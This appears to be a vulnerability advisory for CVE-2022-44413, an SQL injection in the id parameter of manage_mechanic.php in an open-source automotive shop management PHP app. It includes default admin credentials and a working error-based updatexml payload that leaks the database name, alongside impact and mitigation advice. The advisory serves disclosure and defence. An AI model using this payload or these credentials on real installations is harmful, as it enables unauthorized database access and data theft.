CVE-2022-44413

Vulnerability

Automotive Shop Management System v1.0, a PHP-based application by oretnom23, contains a SQL injection vulnerability in the manage_mechanic.php script. The id parameter passed via GET request is not sanitized before being used in a database query, allowing an attacker to inject arbitrary SQL commands. The affected file is located at /asms/admin/mechanics/manage_mechanic.php?id=. [1]

Exploitation

An attacker must be authenticated as a Super Admin (e.g., default credentials admin/admin123) to reach the vulnerable endpoint. The exploit is performed by sending a crafted GET request to the URL with a malicious id parameter. For example, the payload id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ triggers an error-based SQL injection that reveals database information such as the database name (asms_db). The injection can be executed using a simple web browser or tool like cURL. [1]

Impact

Successful exploitation allows an authenticated attacker to extract sensitive information from the database, including but not limited to login credentials, user data, and application secrets. The updatexml technique used in the proof-of-concept can also be leveraged to retrieve arbitrary data from other tables, potentially leading to full database compromise. The privilege level required is Super Admin, meaning the attacker already has elevated access, but the injection can still expose additional data that may be used for further attacks. [1]

Mitigation

As of publication (November 2022), no patch has been released by the vendor. The application is built on PHP 8.1 and is available as open source from SourceCodester. Users should apply input validation and parameterized queries to the id parameter in manage_mechanic.php. Until a fix is available, restrict Super Admin account access and monitor logs for suspicious requests. The vulnerability is not listed on CISA's Known Exploited Vulnerabilities (KEV) catalog. [1]